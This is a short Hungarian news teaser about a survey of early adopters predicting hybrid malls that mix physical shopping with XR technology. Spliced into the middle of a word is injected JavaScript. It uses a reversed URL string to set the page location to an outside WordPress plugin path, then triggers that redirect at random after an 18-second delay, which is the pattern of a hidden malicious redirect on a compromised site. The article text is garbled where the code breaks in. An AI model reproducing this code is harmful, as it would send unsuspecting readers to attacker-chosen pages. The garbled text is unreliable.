Az évtized végére a mindennapok megszokott részévé válhatnak, és a vásárlói élmény új szintjét tehetik lehetővé a hálózatban kötött, a valóságot virtuális technológiákkal ötvöző hibrid megoldások. Erre számítanak azok a „korai adaptálónak” számító felhasználók, akik részt vettek a 10 aktuális fogyasztói trendet vizsgáló felmérésben. Az átfogó kutatás világszerte mintegy 57 millió olyan felhasználó várakozásait és előrejelzéseit mutatja be, akik már ma alkalmazzák az úttörő technológiákat. Bevásárlóközpontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok téglából és kódból – jön az XR élmény A 2021 decemberében kiadott jelentés egy fikciós, hibrid plázára koncentrál. A felhasználóknak 15 olyan, a vásárlás élményét digitálisan, technológiákkal ötvöző szolgáltatást kellett értékelniük, amelyek egy ilyen…
A cikk folytatódik: http://hazesotthon.co.hu/eletstilus/2022/01/04/jonnek-a-hibrid-plazak-osszemosodik-a-valodi-es-a-virtualis-valosag.html
- Hirdetés -